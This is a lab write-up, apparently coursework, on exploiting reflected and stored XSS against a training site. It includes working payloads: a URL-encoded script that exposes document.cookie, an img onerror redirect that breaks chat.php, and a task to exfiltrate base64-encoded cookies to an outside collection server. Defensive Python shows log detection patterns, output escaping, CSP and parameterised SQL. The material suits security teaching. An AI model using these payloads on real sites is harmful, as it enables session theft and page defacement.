
3.1 Hello XSS
- Find out whether your browser contains an XSS auditor and how it works
(does it block the JS or the whole page?).
- The page "hello.php" is vulnerable to reflected XSS.
- Find and exploit the vulnerability to display a "hello world" message via JavaScript.
- Document your final URL and findings.

How does it work?

“The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome,
and Safari that stops pages from loading when they detect reflected cross-site scripting
(XSS) attacks. Although these protections are largely unnecessary in modern browsers
when sites implement a strong Content-Security-Policy that disables the use of inline
JavaScript ('unsafe-inline'), they can still provide protections for users of older web
browsers that don't yet support CSP.” [1]

My web browser is Chrome Version 94.0.4606.71 (Official Build) (64-bit)

The XSS Auditor feature was removed in Google Chrome (chrome-status).
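With the browser-side auditor gone, a reflected-XSS attempt against a page like hello.php is only visible server-side, in the request log. The following Python snippet is an added example (not part of the lab, the course, or any tool it names) that scans access-log lines for URL-encoded markup in query parameters. The log lines are constructed for the example, the indicator patterns are my own choice, and the hostnames and paths are placeholders.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample access-log lines in Apache/nginx "combined" style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:12:01 +0200] "GET /hello.php?name=Alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2021:10:12:07 +0200] "GET /hello.php?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2021:10:13:40 +0200] "GET /hello.php?name=%3Cimg%20src%3D0%20onerror%3Dalert%281%29%3E HTTP/1.1" 200 660 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2021:10:14:02 +0200] "GET /chat.php?msg=see+document.cookie+leak HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request path, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Indicators of HTML/JS injection in a query parameter, checked after URL-decoding.
INDICATORS = (
    re.compile(r"<\s*script\b", re.I),             # 0: script tag
    re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I),  # 1: tag carrying an event handler (onerror=, onload=, ...)
    re.compile(r"javascript\s*:", re.I),           # 2: javascript: URL scheme
    re.compile(r"document\.cookie", re.I),         # 3: cookie access
)


def decode_params(path):
    """Return (name, value) pairs of the query string. parse_qsl decodes once;
    unquote_plus decodes a second time so double-encoded payloads are seen too."""
    pairs = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    return [(name, unquote_plus(value)) for name, value in pairs]


def classify_request(path):
    """Return a list of (parameter name, indicator index) hits for one request path."""
    hits = []
    for name, value in decode_params(path):
        for idx, pattern in enumerate(INDICATORS):
            if pattern.search(value):
                hits.append((name, idx))
    return hits


def scan_log(text):
    """Parse combined-format lines and return alerts as (client_ip, path, hits)."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, _method, path, _status = m.groups()
        hits = classify_request(path)
        if hits:
            alerts.append((ip, path, hits))
    return alerts


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {hits}")
```

The decoding step matters more than the pattern list: a filter that matches on the raw, percent-encoded request line never sees `<script`, which is exactly how the encoded URL in section 3.2 slips past naive grep-based checks.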

Documentation:

1. Using the Vega software, I did a scan of the page.
2. Intercepted the request in the Burp Suite proxy and passed the encoded script.

3. Result:
3.2 Exfiltration using reflected XSS
- Use the vulnerability found in 3.1 to carry out a reflected XSS attack.
- Using JavaScript, obtain the contents of the user's cookies, encode them into a
base64 string and exfiltrate them via XMLHttpRequest (XHR) with a GET request to:
https://dev.netvor.sk/ex/?ami=ais_login&data=exfiltrovane_data
- Test and debug the JavaScript in your own browser first.
- To retrieve the exfiltrated data, visit the page:
https://dev.netvor.sk/ex/data/ais_login.txt
Paste the final attack URL into the form at https://bit.demo-cert.sk/sim/ - which will
simulate a user "click" for you.
Obtain the victim's (simulator's) cookie from the exfiltration server.

Reproducing the reflected XSS vulnerability:

After I encoded the previous script using a URL encoder

Result:

https://xsaleh.bit.demo-cert.sk/hello.php?name=%3Cscript%3E%0Aalert%28decodeURIComponent%28%0A%22Location%3A%20%22%20%2B%20location%20%2B%20%22%5Cn%22%20%2B%20%0A%22Location.hostname%3A%20%22%20%2B%20location.hostname%20%2B%20%22%5Cn%22%20%2B%20%0A%22Location.href%3A%20%22%20%2B%20location.href%20%2B%20%22%5Cn%22%20%2B%20%0A%22Location.pathname%3A%20%22%20%2B%20location.pathname%20%2B%20%22%5Cn%22%20%2B%20%0A%22Location.protocol%3A%20%22%20%2B%20location.protocol%20%2B%20%22%5Cn%22%20%2B%20%0A%22document.cookie%3A%20%22%20%2B%20document.cookie%20%2B%20%22%5Cn%22%0A%29%29%3C%2Fscript%3E

- I opened the URL encoder and wrote a simple JS script to retrieve some useful
information such as cookies, and using Burp Suite, I intercepted the request and
injected the encoded input as input for the name attribute.

- RESULT:
- Encoding cookies to base64:

- After uploading to https://dev.netvor.sk

3.3 Break the web using stored XSS


- The page "chat.php" contains a stored XSS vulnerability.
- Find the leaky variable, bypass the anti-XSS protection in the code and break the page
for future visitors.
- Extra points for a creative form of breaking it :) (html/css/javascript/demo/...)

Blocking
I could block the functionality of chat.php by injecting

<img src=0 onerror=window.location.replace("https://xsaleh.bit.demo-cert.sk/");>

as input for the message field, which is going to redirect all requests to
https://xsaleh.bit.demo-cert.sk/, which in result means chat.php will never be
reached, nor will any file that uses the messages.txt file.
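Both hello.php (3.1, the reflected case) and chat.php (3.3, the stored case) fail for the same reason: untrusted text reaches an HTML context without being encoded for that context, and a blocklist that only strips <script> tags does nothing against an <img> with an onerror handler. The Python below is an added example, not the lab's or the course's code; the blocklist filter, the ChatBoard class and the sample payload are constructed stand-ins for the real pages.

```python
import html
import re

# Constructed stand-in for a naive "anti-XSS" filter: it removes <script> tags only.
SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script[^>]*>", re.I)


def blocklist_filter(text):
    """Blocklist approach: strip <script> tags and hope nothing else executes."""
    return SCRIPT_TAG_RE.sub("", text)


def escape_for_html(text):
    """Encoding approach: every character that can open markup in an HTML text or
    attribute context is turned into an entity, whatever the payload looks like."""
    return html.escape(text, quote=True)


def render_hello(name, sanitizer=escape_for_html):
    """Reflected case (hello.php-like): the query parameter is echoed into the body."""
    return "<p>Hello " + sanitizer(name) + "</p>"


class ChatBoard:
    """Stored case (chat.php-like): posted messages are rendered to every later visitor."""

    def __init__(self, sanitizer=escape_for_html):
        self.messages = []
        self.sanitizer = sanitizer

    def post(self, text):
        # Store the raw message; encode at output time, for the context it lands in.
        self.messages.append(text)

    def render(self):
        return "\n".join("<li>" + self.sanitizer(m) + "</li>" for m in self.messages)


def contains_executable_markup(rendered):
    """Crude check: does the rendered HTML still contain a script tag or a tag with an
    event-handler attribute? (Used to compare the two sanitizers.)"""
    return bool(re.search(r"<\s*script\b|<\s*\w+[^>]*\bon\w+\s*=", rendered, re.I))


# Response header to send alongside encoding, so a missed spot cannot run inline script.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    payload = "<img src=0 onerror=alert(1)>"  # constructed sample, same shape as the lab's
    print("blocklist :", render_hello(payload, blocklist_filter))
    print("escaped   :", render_hello(payload))
    board = ChatBoard()
    board.post(payload)
    print("stored    :", board.render())
```

Encoding is applied at output, not at storage, because the same message may later be placed into a different context (an attribute, a JavaScript string, a URL) where HTML entities are the wrong encoding; the CSP header is the second layer that the MDN quote in 3.1 refers to.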
3.4 Code review

CWE ID     Description                                                                            Line No.
CWE-89     Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')   12
CWE-287    Improper Authentication                                                                11, 18
CWE-1004   Sensitive Cookie Without 'HttpOnly' Flag (cross site scripting)                        18

Description:
The code is vulnerable to SQL injection, as explained in the previous table, at line 12 of
the code; using the parameter data without validation causes it. As a result we can have a
reflected XSS by invalidating the SQL statement and UNION-ing it with an INSERT SQL query to
insert a user whose login holds some JavaScript wrapped in an HTML tag such as <img>, and it
will be executed at line 32.

In addition to SQL injection, it could be escalated to impersonating some user by just
getting their login, and here we will be getting the token, which will be serialized in our
browser.

Another way to get it is by getting the cookies object, because they're stored without using the
HttpOnly flag, which gives the attacker the ability to take advantage of it and get it by
using commands such as document.cookie.

The best way to fix the SQL injection is validating the inputs and escaping the special chars;
we should store cookies with the HttpOnly flag on, and to solve the impersonation issue, I
would recommend tracking the IP used to log in and storing it, as it is going to check new
locations of users who are trying to sign in.
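To make the two fixes from the review concrete (CWE-89 at line 12 and CWE-1004 at line 18), here is an added Python example that is not the reviewed code: it compares a concatenated SQL lookup with a parameterised one, and builds a Set-Cookie header with the HttpOnly flag. The users table, the column names and the cookie name are constructed for the example; the real application's schema is not on the page.

```python
import secrets
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the reviewed login code."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT PRIMARY KEY, token TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'tok-alice'), ('bob', 'tok-bob')")
    return conn


def lookup_user_vulnerable(conn, login):
    """The 'before' pattern (CWE-89): the parameter is concatenated into the statement,
    so a quote in the input changes the SQL instead of staying data."""
    sql = "SELECT login, token FROM users WHERE login = '" + login + "'"
    return conn.execute(sql).fetchone()


def lookup_user_safe(conn, login):
    """Parameterised statement: the driver binds the value; it can never alter the query,
    so no escaping of special characters is needed for SQL."""
    return conn.execute(
        "SELECT login, token FROM users WHERE login = ?", (login,)
    ).fetchone()


def concatenation_breaks(conn, login):
    """True when the concatenated query fails to parse for this input, i.e. the input
    reached the SQL parser rather than being treated as a literal."""
    try:
        lookup_user_vulnerable(conn, login)
        return False
    except sqlite3.OperationalError:
        return True


def set_cookie_header(name, value):
    """Set-Cookie value with the flags the review asks for: HttpOnly keeps the cookie out
    of document.cookie, Secure restricts it to HTTPS, SameSite limits cross-site sending."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Strict"


def issue_session(conn, login):
    """Mint a fresh random session token for a known user and return the header to send,
    or None if the login does not exist. Assumed flow, not the reviewed code's."""
    if lookup_user_safe(conn, login) is None:
        return None
    token = secrets.token_urlsafe(32)
    conn.execute("UPDATE users SET token = ? WHERE login = ?", (token, login))
    return set_cookie_header("session", token)


if __name__ == "__main__":
    db = make_db()
    print("safe lookup  :", lookup_user_safe(db, "o'brien"))          # None, no error
    print("concat breaks:", concatenation_breaks(db, "o'brien"))      # True
    print("header       :", issue_session(db, "alice"))
```

The input "o'brien" is a legitimate name, not an attack string; the point is that the concatenated version cannot even handle it, which is the same defect the review describes at line 12. Parameterisation removes the class of bug; input validation remains useful for data quality but is not what stops injection.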
